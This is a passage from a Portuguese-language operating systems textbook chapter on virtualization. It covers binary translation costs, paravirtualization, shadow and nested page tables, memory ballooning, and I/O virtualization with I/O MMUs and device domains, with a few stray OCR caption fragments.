é conhecido como mudança de mundo (world switch). 
Nós a discutiremos em detalhe quando discutirmos o 
VMware na Seção 7.12. 

Deve ficar claro agora por que esses hipervisores 
funcionam, mesmo em um hardware invirtualizável: 


instruções sensíveis no núcleo hóspede são substituídas 
por chamadas a rotinas que emulam essas instruções. 
Nenhuma instrução sensível emitida pelo sistema ope- 
racional hóspede jamais é executada diretamente pelo 
verdadeiro hardware. Elas são transformadas em cha- 
madas pelo hipervisor, que então as emula. 


7.4.2 Custo da virtualização 


Alguém poderia imaginar ingenuamente que CPUs 
com VT teriam um desempenho muito melhor do que 
técnicas de software que recorrem à tradução, mas as 
mensurações revelam um quadro difuso (ADAMS e 
AGESEN, 2006). No fim das contas, aquela aborda- 
gem de captura e emulação usada pelo hardware VT 
gera uma grande quantidade de capturas, e capturas são 
muito caras em equipamentos modernos, pois elas ar- 
ruinam caches da CPU, TLBs e tabelas de previsão de 
ramificações internas à CPU. Em comparação, quando 
instruções sensíveis são substituídas por chamadas às 
rotinas do hipervisor dentro do processo em execução, 
nada dessa sobrecarga de chaveamento de contexto é 
incorrida. Como Adams e Agesen demonstram, depen- 
dendo da carga de trabalho, às vezes o software bate o 
hardware. Por essa razão, alguns hipervisores tipo 1 (e 
tipo 2) realizam tradução binária por questões de de- 
sempenho, embora o software vá executar corretamente 
sem elas. 

Com a tradução binária, o próprio código traduzido 
pode ser mais lento ou mais rápido do que o código ori- 
ginal. Suponha, por exemplo, que o sistema operacional 
hóspede desabilita as interrupções de hardware usando 
a instrução CLI (“remover interrupções”). Dependendo 
da arquitetura, essa instrução pode ser muito lenta, le- 
vando muitas dezenas de ciclos em determinadas CPUs 
com pipelines profundos e execução fora de ordem. 
Deve estar claro a essa altura que o hóspede querer des- 
ligar interrupções não significa que o hipervisor deva 
realmente desligá-las e afetar a máquina inteira. Desse 
modo, o hipervisor deve desligá-las para o hóspede sem 
desligá-las de fato. Para fazê-lo, ele pode controlar uma 
IF (interrupt flag — flag de interrupção) dedicada na 
estrutura de dados da CPU virtual que ele mantém para 
cada hóspede (certificando-se de que a máquina virtu- 
al não receba nenhuma interrupção até as interrupções 
serem desligadas novamente). Toda ocorrência de CLI 
no hóspede será substituída por algo como “VirtualCPU. 
IF = 0”, que é uma instrução de movimento muito ba- 
rata que pode levar tão pouco quanto um a três ciclos. 
Desse modo, o código traduzido é mais rápido. Ainda 
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assim, com o hardware de VT moderno, normalmente o 
hardware ganha do software. 

Por outro lado, se o sistema operacional hóspede 
modificar suas tabelas de pagina, isso vai sair caro. 
O problema é que cada sistema operacional hóspede em 
uma máquina virtual acredita que ele é “dono” da má- 
quina e tem liberdade de mapear qualquer página virtu- 
al para qualquer página física na memória. No entanto, 
se uma máquina virtual quiser usar uma página física 
que já está em uso por outra (ou o hipervisor), algo tem 
de ceder. Veremos na Seção 7.6 que a solução é adi- 
cionar um nível extra de tabelas de página para mapear 
“páginas físicas hóspedes” às páginas físicas reais no 
hospedeiro. De maneira pouco surpreendente, remexer 
múltiplos níveis de tabelas de páginas não é algo barato. 


7.5 Hipervisores são micronúcleos feitos 
do jeito certo? 


Tanto hipervisores tipo 1 como de tipo 2 funcionam 
com sistemas operacionais hóspedes não modificados, 
mas precisam saltar sobre obstáculos para ter um bom 
desempenho. Vimos que a paravirtualização assume 
uma abordagem diferente modificando o código-fonte 
do sistema operacional hóspede em vez disso. Em vez 
de desempenhar instruções sensíveis, o hóspede para- 
virtualizado executa hiperchamadas. Na realidade, o 
sistema operacional hóspede está agindo como um pro- 
grama do usuário fazendo chamadas do sistema para o 
sistema operacional (o hipervisor). Quando essa rota é 
tomada, o hipervisor precisa definir uma interface que 
consiste em um conjunto de chamada de rotina que os 
sistemas operacionais hóspedes possam usar. Esse con- 
junto de chamadas forma o que é efetivamente uma API 
(Application Programming Interface — Interface de 
Programação de Aplicações) embora seja uma interface 
para ser usada por sistemas operacionais hóspedes, não 
programas aplicativos. 

Avançando um passo, ao removermos todas as ins- 
truções sensíveis do sistema operacional e tê-lo ape- 
nas fazendo hiperchamadas para conseguir serviços do 
sistema como E/S, transformamos o hipervisor em um 
micronúcleo, como o da Figura 1.26. A ideia explora- 
da na paravirtualização é de que emular instruções de 
hardware peculiares é uma tarefa desagradável e que 
dispende tempo. Ela exige uma chamada para o hiper- 
visor e então emular a semântica exata de uma instrução 
complicada. É muito melhor simplesmente ter o sistema 
operacional hóspede chamando o hipervisor (ou micro- 
núcleo) para fazer a E/S, e assim por diante. 
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De fato, alguns pesquisadores argumentaram que 
deveriamos talvez classificar os hipervisores como “mi- 
cronúcleos feitos do jeito certo” (HAND et al., 2005). 
A primeira questão a mencionar é que este é um tópico 
altamente controverso e alguns pesquisadores se opu- 
seram de modo veemente à noção, argumentando que a 
diferença entre os dois não é fundamental, para começo 
de conversa (HEISER et al., 2006). Outros sugerem que 
comparados aos micronúcleos, hipervisores talvez nem 
sejam tão adequados para construir sistemas seguros, e 
defendem que eles sejam estendidos com a funciona- 
lidade de núcleos, como a passagem de mensagens e 
o compartilhamento de memória (HOHMUTH et al., 
2004). Por fim, alguns pesquisadores argumentam que 
talvez hipervisores não sejam nem “pesquisa sobre sis- 
temas operacionais feita do jeito certo” (ROSCOE et 
al., 2007). Já que ninguém disse nada sobre livros didá- 
ticos de sistemas operacionais feitos do jeito certo (ou 
errado) — ainda — acreditamos que fazemos bem em 
explorar um pouco mais a similaridade entre hiperviso- 
res e micronúcleos. 

A principal razão por que os primeiros hipervisores 
emularam a máquina completa foi a falta de disponi- 
bilidade de um código-fonte para o sistema operacio- 
nal hóspede (por exemplo, para o Windows) ou o vasto 
número de variantes (por exemplo, Linux). Talvez no 
futuro o API de hipervisor/micronúcleo seja padroniza- 
do, e sistemas operacionais subsequentes sejam projeta- 
dos para chamá-lo em vez de usar instruções sensíveis. 
Fazê-lo facilitaria o suporte e o uso da tecnologia de 
máquinas virtuais. 

A diferença entre a virtualização e a paravirtualiza- 
ção está ilustrada na Figura 7.5. Aqui temos duas má- 
quinas virtuais sendo suportadas em um hardware com 
VT. À esquerda, há uma versão inalterada do Windows 
como o sistema operacional hóspede. Quando uma 
instrução sensível é executada, o hardware causa uma 
captura para o hipervisor, que então o emula e retorna. 
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À direita há uma versão do Linux modificada, portanto 
ela não contém mais quaisquer instruções sensíveis. Em 
vez disso, quando precisa fazer E/S ou mudar os regis- 
tros internos críticos (como aquele apontando para as 
tabelas de página), ele faz uma chamada de hipervisor 
para finalizar o trabalho, como um programa de aplica- 
ção fazendo uma chamada de sistema em Linux padrão. 

Na Figura 7.5 mostramos o hipervisor dividido em 
duas partes separadas por uma linha tracejada. Na rea- 
lidade, apenas um programa está executando no hard- 
ware. Uma parte dele é responsável por interpretar 
instruções sensíveis que geraram capturas, nesse caso, 
do Windows. A outra parte dele apenas leva adiante 
hiperchamadas. Na figura, a segunda parte é rotulada 
“micronucleo”. Se o hipervisor será usado para executar 
apenas sistemas operacionais hóspedes paravirtualiza- 
dos, não há necessidade para a emulação de instruções 
sensíveis e temos um verdadeiro micronúcleo, que pro- 
vém apenas serviços muito básicos, como despachar 
processo e gerenciar a MMU. O limite entre um hiper- 
visor tipo 1 e um micronúcleo já é vago e ficará ainda 
menos claro à medida que os hipervisores começarem 
a adquirir mais e mais funcionalidade e hiperchamadas 
como parece provável. Mais uma vez, esse assunto é 
controverso, mas está ficando cada dia mais claro que o 
programa executando em modo núcleo diretamente no 
hardware deve ser pequeno e confiável e consistir em 
milhares, não milhões, de linhas de código. 

A paravirtualização do sistema operacional hóspe- 
de levanta uma série de questões. Primeiro, se as ins- 
truções sensíveis são substituídas por chamadas para 
o hipervisor, como pode o sistema operacional execu- 
tar no hardware nativo? Afinal de contas, o hardware 
não compreende essas hiperchamadas. E segundo, e se 
existem múltiplos hipervisores disponíveis no merca- 
do, como o VMware, o open source Xen originalmente 
da Universidade de Cambridge e o Hyper-V da Micro- 
soft, todos com APIs de hipervisores de certa maneira 
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diferentes? Como o núcleo pode ser modificado para 
executar em todos eles? 

Amsden et al. (2006) propuseram uma solução. No 
seu modelo, o núcleo é modificado para chamar rotinas 
especiais sempre que ele precisa fazer algo sensível. Jun- 
tas, essas rotinas, chamadas de VMI (Virtual Machine 
Interface — Interface de maquina virtual), formam uma 
camada de baixo nível que serve como interface com o 
hardware ou com o hipervisor. Essas rotinas são proje- 
tadas para serem genéricas e não vinculadas a qualquer 
plataforma de hardware específica ou a qualquer hiper- 
visor em particular. 

Um exemplo dessa técnica é dado na Figura 7.6 para 
uma versão paravirtualizada do Linux que eles chamam 
VMI Linux (VMIL). Quando o VMI Linux executa em 
um hardware simples, ele precisa estar ligado a uma 
biblioteca que emite a instrução (sensível) real neces- 
sária para realizar o trabalho, como mostrado na Figu- 
ra 7.6(a). Quando executa em um hipervisor, digamos 
VMware ou Xen, o sistema operacional hóspede é liga- 
do a diferentes bibliotecas que fazem as hiperchamadas 
apropriadas (e diferentes) para o hipervisor subjacente. 
Dessa maneira, o núcleo do sistema operacional segue 
portátil, no entanto, é amigável ao hipervisor e ainda 
assim eficiente. 

Outras propostas para uma interface de máquina vir- 
tual também foram feitas. Uma interface popular é cha- 
mada paravirt ops. A ideia é conceitualmente similar 
ao que foi descrito há pouco, mas diferente em deta- 
lhes. Na essência, um grupo de vendedores Linux que 
incluem empresas como IBM, VMware, Xen e Red Hat 
defenderam uma interface hipervisor-agnóstica para o 
Linux. A interface, incluída no núcleo da linha principal 
da versão 2.6.23 em diante, permite que o núcleo con- 
verse com qualquer hipervisor que esteja gerenciando o 
hardware físico. 
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7.6 Virtualização da memória 


Até o momento abordamos a questão de como vir- 
tualizar a CPU. Mas um sistema de computadores tem 
mais do que somente uma CPU. Ele também tem dis- 
positivos de memória e E/S. Eles também precisam ser 
virtualizados. Vamos ver como isso é feito. 

Quase todos os sistemas operacionais modernos 
dão suporte à memória virtual, o que é basicamente um 
mapeamento de páginas no espaço de endereçamento 
virtual para as páginas da memória física. Esse mapea- 
mento é definido por tabelas de páginas (em múltiplos 
níveis). Em geral, o mapeamento é colocado para fun- 
cionar fazendo que o sistema operacional estabeleça um 
registro de controle na CPU que aponte para a tabela 
de página no nível mais alto. A virtualização complica 
muito o gerenciamento de memória. Na realidade, os 
fabricantes de hardwares precisaram de duas tentativas 
para acertar. 

Suponha, por exemplo, que uma máquina virtual 
está executando, e o sistema operacional hospedado 
nela decide mapear suas páginas virtuais 7, 4 e 3 nas pá- 
ginas físicas 10, 11 e 12, respectivamente. Ele constrói 
tabelas de páginas contendo esse mapeamento e carrega 
um registrador de hardware para apontar para a tabe- 
la de páginas de alto nível. Essa instrução é sensível. 
Em uma CPU com VT, ela vai gerar uma captura; com 
a tradução dinâmica vai provocar uma chamada para 
uma rotina do hipervisor; em um sistema operacional 
paravirtualizado, isso vai gerar uma hiperchamada. Para 
simplificar, vamos presumir que ela gere uma captura 
para um hipervisor tipo 1, mas o problema é o mesmo 
em todos os três casos. 

O que o hipervisor faz agora? Uma solução é real- 
mente alocar as páginas físicas 10, 11 e 12 para essa 
máquina virtual e estabelecer as tabelas de páginas reais 


alelo WAS VMI Linux executando em (a) hardware simples, (b) VMware, (c) Xen. 
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para mapear as páginas virtuais da maquina virtual 7, 4 
e 3 para usá-las. Até aqui, tudo bem. 

Agora suponha que uma segunda máquina virtual 
inicialize e mapeie suas páginas virtuais 4, 5 e 6 nas pá- 
ginas físicas 10, 11 e 12 e carregue o registro de contro- 
le para apontar para suas tabelas de página. O hipervisor 
realiza a captura, mas o que ele vai fazer? Ele não pode 
usar esse mapeamento porque as páginas físicas 10, 11 
e 12 já estão em uso. Ele pode encontrar algumas pági- 
nas livres, digamos 20, 21 e 22, e usá-las, mas primeiro 
tem de criar novas tabelas mapeando as páginas virtuais 
4, 5 e 6 da máquina virtual 2 em 20, 21 e 22. Se outra 
maquina virtual inicializar e tentar usar as páginas fisi- 
cas 10, 11 e 12, ele terá de criar um mapeamento para 
elas. Em geral, para cada máquina virtual o hipervisor 
precisa criar uma tabela de página sombra (shadow 
page table) que mapeie as páginas virtuais usadas pela 
máquina virtual para as páginas reais que o hipervisor 
lhe deu. 

Pior ainda, toda vez que o sistema operacional hós- 
pede mudar suas tabelas de página, o hipervisor tem 
de mudar as tabelas de páginas sombras também. Por 
exemplo, se o SO hóspede remapear a página virtual 
7 para o que ele vê como a página física 200 (em vez 
de 10), o hipervisor precisa saber sobre essa mudança. 
O problema é que o sistema operacional hóspede pode 
mudar suas tabelas de página apenas escrevendo para a 
memória. Nenhuma operação sensível é necessária, en- 
tão o hipervisor nem faz ideia da mudança e certamente 
não poderá atualizar as tabelas de páginas sombras usa- 
das pelo hardware real. 

Uma solução possível (mas desajeitada) é o hiper- 
visor acompanhar qual página na memória virtual do 
hóspede contém a tabela de página de alto nível. Ele 
pode conseguir essa informação na primeira vez que 
o hóspede tentar carregar o registro do hardware que 
aponta para ele, pois essa instrução é sensível e gera 
uma captura. O hipervisor pode criar uma tabela de 
página sombra a essa altura e também mapear a tabela 
de página de alto nível e as tabelas de página para as 
quais ele aponta como somente leitura. Uma tentativa 
subsequente por parte do sistema operacional hóspede 
de modificar qualquer uma delas causará uma falta de 
página e assim dará o controle para o hipervisor, que 
pode analisar o fluxo de instrução, descobrir o que o SO 
hóspede está tentando fazer e atualizar as tabelas de pá- 
ginas sombras de acordo. Não é bonito, mas é possível 
em princípio. 

Outra solução tão desajeitada quanto é fazer exata- 
mente o oposto. Nesse caso, o hipervisor simplesmen- 
te permite que o hóspede adicione novos mapeamentos 


às suas tabelas de páginas conforme sua vontade. À 
medida que isso está acontecendo, nada muda nas ta- 
belas de páginas sombras. Na realidade, o hipervisor 
nem tem ciência disso. No entanto, tão logo o hóspe- 
de tenta acessar qualquer uma das páginas novas, uma 
falta vai ocorrer e o controle reverte para o hipervi- 
sor. O hipervisor inspeciona as tabelas de página do 
hóspede para ver se há um mapeamento que ele deva 
acrescentar e, se afirmativo, o adiciona e reexecuta a 
instrução que causou a falta. E se o hóspede remover 
um mapeamento das suas tabelas de página? Clara- 
mente, o hipervisor não poderá esperar que uma falta 
de página aconteça, pois ela não acontecerá. A remo- 
ção de um mapeamento de uma tabela de página acon- 
tece via uma instrução INVLPG (que na realidade tem 
a intenção de invalidar uma entrada TLB). Portanto, o 
hipervisor intercepta essa instrução e remove o mape- 
amento da tabela de página sombra também. De novo, 
não é bonito, mas funciona. 

Ambas as técnicas incorrem em muitas faltas de 
páginas, e tais faltas são caras. Em geral distinguimos 
entre faltas de páginas “normais” que são causadas por 
programas hóspedes que acessam uma página que foi 
paginada da RAM, e faltas de páginas que são relacio- 
nadas a assegurar que as tabelas de páginas sombras e as 
tabelas de páginas do hóspede estejam em sincronia. As 
primeiras são conhecidas como faltas de páginas indu- 
zidas pelo hóspede e, embora sejam interceptadas pelo 
hipervisor, elas precisam ser injetadas novamente no 
hóspede. Isso não sai nem um pouco barato. As segun- 
das são conhecidas como faltas de páginas induzidas 
pelo hipervisor e são tratadas mediante a atualização 
de tabelas de páginas sombras. 

Faltas de páginas são sempre caras, mas isso é es- 
pecialmente verdadeiro em ambientes virtualizados, 
pois eles levam às chamadas saídas para VM (VM exit). 
Uma saída para VM é uma situação na qual o hipervi- 
sor recupera o controle. Considere o que a CPU precisa 
fazer para que essa saída para VM aconteça. Primeiro, 
ela registra a causa da saída para VM, de maneira que 
o hipervisor saiba o que fazer. Ela também registra o 
endereço da instrução hóspede que causou a saída. Em 
seguida, é realizado um chaveamento de contexto, que 
inclui salvar todos os registros. Então, ela carrega o es- 
tado de processador do hipervisor. Apenas então o hi- 
pervisor pode começar a lidar com a falta de página, 
que era cara para começo de conversa. E quando tudo 
isso tiver sido feito, ela pode inverter os passos. Todo 
o processo pode levar dezenas de milhares de ciclos, 
ou mais. Não causa espanto que as pessoas façam um 
esforço para reduzir o número de saídas. 


Em um sistema operacional paravirtualizado, a si- 
tuação é diferente. Aqui o OS paravirtualizado no hós- 
pede sabe que, quando ele tiver concluído a mudança 
da tabela de página de algum processo, é melhor ele 
informar o hipervisor. Em consequência, ele primeiro 
muda completamente a tabela de páginas, então emite 
uma chamada do hipervisor contando a ele sobre a nova 
tabela de página. Assim, em vez de uma falta de pro- 
teção em cada atualização à tabela de página, há uma 
hiperchamada quando toda a coisa foi atualizada, ob- 
viamente uma maneira mais eficiente de fazer negócios. 


Suporte de hardware para tabelas de páginas 
aninhadas 


O custo de lidar com tabelas de páginas sombras le- 
vou os produtores de chips a adicionar suporte de hard- 
ware para tabelas de páginas aninhadas. Tabelas de 
páginas aninhadas é o termo usado pela AMD. A Intel 
refere-se a elas como EPT (Extended Page Tables — 
Tabelas de Páginas Estendidas). Elas são similares e 
buscam remover a maior parte da sobrecarga lidando 
com toda a manipulação de tabelas de páginas adicio- 
nais no hardware, tudo isso sem capturas. De maneira 
interessante, as primeiras extensões de virtualização 
no hardware x86 da Intel não incluíam nenhum su- 
porte para a virtualização de memória. Embora esses 
processadores de VT-estendida removessem quaisquer 
gargalos relativos à virtualização da CPU, remexer nas 
tabelas de páginas continuava tão caro como sempre. 
Foram necessários alguns anos para a AMD e a Intel 
produzirem o hardware para virtualizar a memória de 
maneira eficiente. 

Lembre-se de que mesmo sem a virtualização, o sis- 
tema operacional mantém um mapeamento entre as pá- 
ginas virtuais e a página física. O hardware “caminha” 
por essas tabelas de páginas para encontrar o endereço 
físico que corresponda ao endereço virtual. Acrescentar 
máquinas virtuais simplesmente acrescenta um mape- 
amento extra. Como um exemplo, suponha que pre- 
cisemos traduzir um endereço virtual de um processo 
Linux executando em um hipervisor tipo 1 como Xen 
ou VMware ESX Server para um endereço físico. Além 
dos endereços virtuais do hóspede, também temos 
agora endereços físicos do hóspede e, subsequente- 
mente, endereços físicos do hospedeiro (às vezes refe- 
ridos como endereços físicos de máquina). Vimos que 
sem EPT, o hipervisor é responsável por manter as tabe- 
las de páginas sombras explicitamente. Com EPT, o hi- 
pervisor ainda tem um conjunto adicional de tabelas de 
páginas, mas agora a CPU é capaz de lidar com grande 
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parte do nível intermediário em hardware também. Em 
nosso exemplo, o hardware primeiro caminha pelas ta- 
belas de páginas “regulares” para traduzir o endereço 
virtual do hóspede para um endereço físico do hóspe- 
de, da mesma maneira que ele faria sem virtualização. 
A diferença é que ele também caminha pelas tabelas de 
páginas estendidas (ou aninhadas) sem a intervenção do 
software para descobrir o endereço físico do hospedei- 
ro, e ele precisa fazer isso toda vez que um endereço 
físico do hóspede seja acessado. A tradução é ilustrada 
na Figura 7.7. 

Infelizmente, o hardware talvez precise caminhar 
pelas tabelas de páginas aninhadas mais vezes do que 
você possa pensar. Vamos supor que o endereço virtual 
do hóspede não estava armazenado em cache e exija 
uma busca completa nas tabelas de páginas. Todo nível 
na hierarquia de paginação incorre em uma busca nas 
tabelas de páginas aninhadas. Em outras palavras, o nú- 
mero de referências de memória cresce quadraticamen- 
te com a profundidade da hierarquia. Mesmo assim, o 
EPT reduz drasticamente o número de saídas para VM. 
Hipervisores não precisam mais mapear a tabela de pá- 
gina do hóspede como somente de leitura e podem se 
livrar do tratamento de tabela de página sombra. Melhor 
ainda, quando alterna entre máquinas virtuais, ele ape- 
nas muda esse mapeamento, da mesma maneira que um 
sistema operacional muda o mapeamento quando alter- 
na entre processos. 


Recuperando a memória 


Ter todas essas máquinas virtuais no mesmo hard- 
ware físico com suas próprias páginas de memória e 
todas achando que mandam é ótimo — até precisarmos 
da nossa memória de volta. Isso é particularmente im- 
portante caso ocorra uma sobrealocação (overcommit) 
da memória, onde o hipervisor finge que o montante 
total de memória para todas as máquinas virtuais com- 
binadas é maior do que o montante total de memória 
física presente no sistema. Em geral, essa é uma boa 
ideia, pois ela permite que o hipervisor admita mais e 
mais máquinas virtuais potentes ao mesmo tempo. Por 
exemplo, em uma máquina com 32 GB de memória, ele 
pode executar três máquinas virtuais, cada uma pensan- 
do que ela tem 16 GB de memória. Claramente, isso não 
funciona. No entanto, talvez as três máquinas não pre- 
cisem de fato da quantidade máxima de memória física 
ao mesmo tempo. Ou talvez elas compartilhem páginas 
que têm o mesmo conteúdo (como o núcleo Linux) em 
diferentes máquinas virtuais em uma otimização conhe- 
cida como deduplicação. Nesse caso, as três máquinas 
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elle Tabelas de páginas estendidas/aninhadas são “caminhadas” toda vez que um endereço físico hóspede é acessado — 
incluindo os acessos para cada nível das tabelas de página do hóspede. 
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virtuais usam um montante total de memoria que é me- 
nor do que 3 vezes 16 GB. Discutiremos a deduplicação 
mais tarde; por ora o ponto é que o que parece ser uma 
boa distribuição agora pode ser uma má distribuição à 
medida que a carga de trabalho mudar. Talvez a má- 
quina virtual 1 precise de mais memória, enquanto a 
máquina virtual 2 poderia operar com menos páginas. 
Nesse caso, seria bom se o hipervisor pudesse transferir 
recursos de uma máquina virtual para outra e fazer o 
sistema como um todo beneficiar-se. A questão é: como 
podemos tirar páginas da memória com segurança se 
essa memória já foi dada para uma máquina virtual? 
Em princípio, poderíamos ver outro nível ainda 
de paginação. No caso da escassez de memória, o hi- 
pervisor paginaria para fora algumas das páginas da 
máquina virtual, da mesma maneira que um sistema 
operacional poderia paginar para fora algumas das 
páginas de aplicação. O problema dessa abordagem é 
que o hipervisor deveria fazer isso, e ele não faz ideia 
de quais páginas são as mais valiosas para o hóspede. 
É muito provável que elimine as páginas erradas. Mes- 
mo que ele escolha as páginas certas para trocar (isto 
é, as páginas que o SO hóspede também teria escolhi- 
do), ainda há mais problemas à frente. Por exemplo, 
suponha que o hipervisor elimine uma página P. Um 
pouco mais tarde, o SO hóspede também decide elimi- 
nar essa página para o disco. Infelizmente, o espaço 
de troca do hipervisor e o do hóspede não são os mes- 
mos. Em outras palavras, o hipervisor tem de primeiro 























paginar os conteúdos de volta para a memória, apenas 
para ver o hóspede escrevê-los de volta para o disco 
imediatamente. Não é algo muito eficiente. 

Uma solução comum é usar um truque conhecido 
como ballooning, onde um pequeno módulo balão é 
carregado em cada VM como um pseudodriver de dis- 
positivo para o hipervisor. O módulo balão pode inflar 
diante da solicitação do hipervisor alocando mais e mais 
páginas marcadas, e desinflar “desalocando” essas pá- 
ginas. À medida que o balão infla, a escassez de memó- 
ria no hóspede diminui. O sistema operacional hóspede 
responderá paginando para fora o que ele acredita serem 
as páginas menos valiosas — o que é simplesmente o 
que queríamos. De maneira contrária, à medida que 
o balão desinfla, mais memória torna-se disponível 
para o hóspede alocar. Em outras palavras, o hipervisor 
induz o sistema operacional a tomar decisões difíceis 
por ele. Na política, isso é conhecido como empurrar a 
responsabilidade. 


7.7 Virtualização de E/S 


Tendo estudado a CPU e a virtualização de memó- 
ria, em seguida examinaremos a virtualização de E/S. 
O sistema operacional hóspede tipicamente começará 
sondando o hardware para descobrir que tipos de dis- 
positivos de E/S estão ligados. Essas sondas gerarão 
uma captura para o hipervisor. O que o hipervisor deve 


fazer? Uma abordagem é ele reportar de volta que os 
discos, impressoras e assim por diante são os dispositi- 
vos que o hardware realmente tem. O hóspede carregará 
drivers de dispositivos para eles e tentará usá-los. Quan- 
do os drivers do dispositivo tentam realizar a E/S real, 
eles lerão e escreverão nos registros de dispositivos de 
hardware do dispositivo. Essas instruções são sensíveis 
e gerarão capturas para o hipervisor, que poderia então 
copiar os valores necessários para e dos registradores do 
hardware, conforme necessário. 

Mas aqui, também, temos um problema. Cada SO hós- 
pede poderia pensar que ele é proprietário de uma partição 
inteira de disco, e pode haver muitas máquinas virtuais 
mais (centenas) do que existem partições de disco reais. 
A solução usual é o hipervisor criar um arquivo ou região 
no disco real para cada disco físico da máquina virtu- 
al. Já que o SO hóspede está tentando controlar um disco 
que o hardware real tem (e que o hipervisor compreende), 
pode converter o número de bloco sendo acessado em um 
deslocamento (offset) dentro do arquivo ou região do disco 
sendo usada para armazenamento e realizar a E/S. 

Também é possível que o disco que o hóspede está 
usando seja diferente do disco real. Por exemplo, se 
o disco real é algum disco novo de alto desempenho 
(ou RAID) com uma interface nova, o hipervisor pode- 
ria notificar para o SO hóspede que ele tem um disco 
IDE antigo simples e deixar que o SO hóspede insta- 
le um driver de disco IDE. Quando esse driver emite 
comandos de disco IDE, o hipervisor os converte em 
comandos para o novo disco. Essa estratégia pode ser 
usada para atualizar o hardware sem mudar o software. 
Na realidade, essa capacidade das máquinas virtuais de 
remapear dispositivos de hardware foi uma das razões 
de o VM/370 ter se tornado popular: as empresas que- 
riam comprar hardwares novos e mais rápidos, mas não 
queriam mudar seu software. A tecnologia de máquinas 
virtuais tornou isso possível. 

Outra tendência interessante relacionada à E/S é que 
o hipervisor pode assumir papel de um switch virtual. 
Nesse caso, cada máquina virtual tem um endereço 
MAC e o hipervisor troca quadros de uma maquina vir- 
tual para outra — como um switch de Ethernet faria. 
Switchs virtuais têm várias vantagens. Por exemplo, é 
muito fácil reconfigurá-los. Também, é possível incre- 
mentar o switch com funcionalidades adicionais, por 
exemplo, para segurança adicional. 


MMUs de E/S 


Outro problema de E/S que deve ser solucionado 
de certa maneira é o uso do DMA, que usa endereços 
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de memória absolutos. Como poderia ser esperado, o 
hipervisor tem de intervir aqui e remapear os endere- 
ços antes que o DMA inicie. No entanto, o hardware 
já existe com uma MMU de E/S, que virtualiza a E/S 
da mesma maneira que a MMU virtualiza a memória. 
MMU de F/S existe em formas e formatos diferentes 
para muitas arquiteturas de processadores. Mesmo que 
nos limitássemos ao x86, Intel e AMD têm uma tecno- 
logia ligeiramente diferente. Ainda assim, a ideia é a 
mesma. Esse hardware elimina o problema de DMA. 

Assim como MMUs regulares, a MMU de E/S usa 
tabelas de páginas para mapear um endereço de memó- 
ria que um dispositivo quer usar (o endereço do disposi- 
tivo) para um endereço físico. Em um ambiente virtual, 
o hipervisor pode estabelecer as tabelas de páginas de 
tal maneira que um dispositivo realizando DMA não irá 
pisotear a memória que não pertence à máquina virtual 
para a qual ele está trabalhando. 

MMUS de E/S oferecem vantagens diferentes quan- 
do lidando com um dispositivo em um mundo virtuali- 
zado. A passagem direta do dispositivo (device pass 
through) permite que o dispositivo físico seja designa- 
do diretamente para uma máquina virtual em particular. 
Em geral, o ideal seria o espaço de endereçamento do 
dispositivo ser exatamente o mesmo que o espaço de 
endereçamento físico do hóspede. No entanto, isso é 
improvável — a não ser que você tenha uma MMU de 
E/S. A MMU permite que os endereços sejam remape- 
ados com transparência, e tanto o dispositivo quanto a 
máquina virtual desconhecem alegremente a tradução 
de endereços que ocorre por baixo dos panos. 

O isolamento de dispositivo assegura que um dis- 
positivo designado a uma máquina virtual possa aces- 
sar diretamente aquela máquina virtual sem atrapalhar 
a integridade dos outros hóspedes. Em outras palavras, 
a MMU de E/S evita o tráfego de DMA “trapaceiro”, da 
mesma maneira que a MMU normal mantém acessos de 
memória “trapaceiros” longe dos processos — em am- 
bos os casos, acessos a páginas não mapeadas resultam 
em faltas. 

DMA e endereços não são toda a história de E/S, 
infelizmente. Para completar a questão, também pre- 
cisamos virtualizar as interrupções, de maneira que a 
interrupção gerada por um dispositivo chega à máqui- 
na virtual certa, com o número de interrupção certo. 
MMUs de E/S modernos, portanto, suportam o rema- 
peamento de interrupções. Por exemplo, um dispositi- 
vo envia uma mensagem de interrupção sinalizada com 
o número 1. Essa mensagem primeiro atinge o MMU 
de E/S que usará a tabela de remapeamento da interrup- 
ção para traduzir para uma nova mensagem destinada à 
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CPU que atualmente executa a máquina virtual e com 
o número de vetor que o VM espera (por exemplo, 66). 

Por fim, ter una MMU de E/S também ajuda dispo- 
sitivos de 32 bits a acessar memórias acima de 4 GB. 
Em geral, tais dispositivos são incapazes de acessar (por 
exemplo, realizar DMA) para endereços além de 4 GB, 
mas a MMU de E/S pode facilmente remapear os ende- 
reços mais baixos do dispositivo para qualquer endere- 
ço no espaço de endereçamento físico maior. 


Domínios de dispositivos 


Uma abordagem diferente para lidar com E/S é de- 
dicar uma das máquinas virtuais para executar um sis- 
tema operacional padrão e refletir todas as chamadas de 
E/S das outras para ela. Essa abordagem é incrementada 
quando a paravirtualização é usada, assim o comando 
emitido para o hipervisor realmente diz o que o SO 
hóspede quer (por exemplo, ler bloco 1403 do disco 1) 
em vez de ser uma série de comandos escrevendo para 
registradores de dispositivos, caso em que o hipervisor 
tem de dar uma de Sherlock Holmes e descobrir o que 
ele está tentando fazer. Xen usa essa abordagem para 
E/S, com a máquina virtual que faz E/S chamada do- 
minio 0. 

A virtualização de E/S é uma área na qual hiperviso- 
res tipo 2 têm uma vantagem prática sobre hipervisores 
tipo 1: o sistema operacional hospedeiro contém os dri- 
vers de dispositivo para todos os dispositivos de E/S es- 
quisitos e maravilhosos ligados ao computador. Quando 
um programa aplicativo tenta acessar um dispositivo de 
E/S estranho, o código traduzido pode chamar o driver 
de dispositivo existente para realizar o trabalho. Com 
um hipervisor tipo 1, o hipervisor precisa conter o pró- 
prio driver, ou fazer uma chamada para um driver em 
domínio 0, que é de certa maneira similar a um siste- 
ma operacional hospedeiro. À medida que a tecnolo- 
gia de máquinas virtuais amadurece, é provável que o 
hardware futuro permita que os programas aplicativos 
acessem o hardware diretamente de uma maneira segu- 
ra, significando que os drivers do dispositivo podem ser 
ligados diretamente com o código da aplicação ou colo- 
cados em servidores de modo usuário separados (como 
no MINIX3), eliminando assim o problema. 


Virtualização de E/S de raiz única 


Designar diretamente um dispositivo para uma má- 
quina virtual não é muito escalável. Com quatro redes 
físicas você pode dar suporte a não mais do que quatro 


máquinas virtuais dessa maneira. Para oito máquinas 
virtuais, você precisa de oito placas de rede, e executar 
128 máquinas virtuais — bem, digamos que pode ser 
difícil encontrar o seu computador enterrado debaixo de 
todos esses cabos de rede. 

Compartilhar dispositivos entre múltiplos hipervi- 
sores em software é possível, mas muitas vezes não 
ótimo, pois uma camada de emulação (ou domínio de 
dispositivo) interpõe-se entre o hardware e os dispositi- 
vos e OS sistemas operacionais hóspedes. O dispositivo 
